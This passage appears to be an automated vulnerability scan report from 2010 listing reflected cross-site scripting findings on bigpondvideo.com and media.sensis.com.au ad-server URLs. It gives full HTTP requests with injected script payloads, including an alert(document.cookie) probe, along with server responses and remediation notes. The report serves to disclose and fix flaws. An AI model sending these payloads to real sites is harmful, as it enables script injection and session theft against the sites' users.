GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346a42d2%3balert(1)//cdc3d0cb702&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the width request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80943</script><script>alert(1)</script>9695fac6a30 was submitted in the width parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=34680943</script><script>alert(1)</script>9695fac6a30&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the width request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c02ea</script><script>alert(1)</script>17e55b357fa was submitted in the width parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346c02ea</script><script>alert(1)</script>17e55b357fa&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the windowless request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66af8</script><script>alert(1)</script>be71be31e was submitted in the windowless parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=166af8</script><script>alert(1)</script>be71be31e&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the windowless request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 87988%3balert(1)//d08e1f18268 was submitted in the windowless parameter. This input was echoed as 87988;alert(1)//d08e1f18268 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=187988%3balert(1)//d08e1f18268&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of the wmv request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6202a</script><script>alert(1)</script>c49447b2265 was submitted in the wmv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=16202a</script><script>alert(1)</script>c49447b2265&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1 Host: iad.bigpondvideo.com Proxy-Connection: keep-alive Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9827"><script>alert(1)</script>4e5c52ad3d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hservere9827"><script>alert(1)</script>4e5c52ad3d3/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(1)%3C/script%3Edd03f420596=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:55 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 374 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29cb7"><script>alert(1)</script>53acb15f742 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random29cb7"><script>alert(1)</script>53acb15f742=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(1)%3C/script%3Edd03f420596=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:56 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 374 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.588. http://media.sensis.com.au/hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a24cd"><script>alert(1)</script>bb9cc0d4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891?a24cd"><script>alert(1)</script>bb9cc0d4b2=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/news/?13b1b'%3E%3Cscript%3Ealert(1)%3C/script%3Edd03f420596=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:54 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 376 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fab5"><script>alert(1)</script>733cc2a069 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:48 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 696 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=000A4F2D31300CEB0148C2DC61626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c13a"><script>alert(1)</script>5cc2daa8e04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:50 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 471 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=000A559831320CEB2513A17761626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.591. http://media.sensis.com.au/hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f17"><script>alert(1)</script>0d32a448396 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:47 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 482 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=00097CA7312F0CEB2E17914661626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce0c4"><script>alert(1)</script>754400e4bcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserverce0c4"><script>alert(1)</script>754400e4bcd/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:42 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 511 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3fe3"><script>alert(1)</script>7dc6c83e7d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randomb3fe3"><script>alert(1)</script>7dc6c83e7d1=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:43 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 511 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.594. http://media.sensis.com.au/hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6512d"><script>alert(1)</script>1eb016faed5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?6512d"><script>alert(1)</script>1eb016faed5=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:41 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 514 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22575"><script>alert(1)</script>bedb98fa2c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver22575"><script>alert(1)</script>bedb98fa2c8/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:53 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 693 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38329"><script>alert(1)</script>a73b3923879 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random38329"><script>alert(1)</script>a73b3923879=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:13:04 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 467 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.597. http://media.sensis.com.au/hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4abcb"><script>alert(1)</script>46cce4301c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
